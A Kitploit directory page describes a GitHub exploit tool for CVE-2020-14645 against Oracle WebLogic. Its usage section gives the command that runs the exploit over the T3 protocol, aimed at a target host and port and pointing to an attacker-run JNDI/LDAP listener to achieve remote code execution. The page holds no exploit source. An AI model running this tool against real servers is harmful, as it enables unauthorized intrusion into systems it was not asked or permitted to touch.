Skip to content
KitploitKITPLOIT
ToolsBlog
Submit
ToolsBlog
Submit

Hacking, PenTest, and Cybersecurity Tools for Your Security Arsenal!

Kitploit is a directory of hacking, cybersecurity, and pentesting tools. Discover the latest project updates to find vulnerabilities, analyze systems, automate testing, and strengthen your security.

··Feeds·Contact·Privacy·© 2026 Kitploit

Tool Directory

Categories

View all categories
Loading categories
CVE-2020-14645 | Kitploit
Tools/GitHubGitHub/daboquan/cve-2020-14645
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration Testing
GitHubdaboquan/cve-2020-14645

CVE-2020-14645

View Repository
36 years agoNot yet reviewed

Most Popular

View all →

Discover the most used tools by our community.

Explore all tools

Browse our collection of tools

View all tools →
Share

CVE-2020-14645

Usage

First, use NDI-Injection-Exploit to listen and generate an LDAP address.

java -jar WeblogicT3.jar -Target 127.0.0.1 -Port [7001] -RMI ldap://127.0.0.1:1389/dozvtq [--SSL]

-Target and -RMI are required. For HTTPS, use the --SSL parameter. -Port defaults to 7001.

If compiling from source, you need to add coherence.jar and wlfullclient.jar.

Vulnerability Reference:

https://mp.weixin.qq.com/s?__biz=MzUyMDEyNTkwNA==&mid=2247484377&idx=1&sn=01d62d175127099275a243ab5fe02bc3&chksm=f9ee6f66ce99e670dbb6da2a3648ea5f6a91fa503441dccd903f44e76883019890d8a9701a29&scene=158#rd

Code Reference:

https://github.com/Y4er/CVE-2020-2883

Download Tool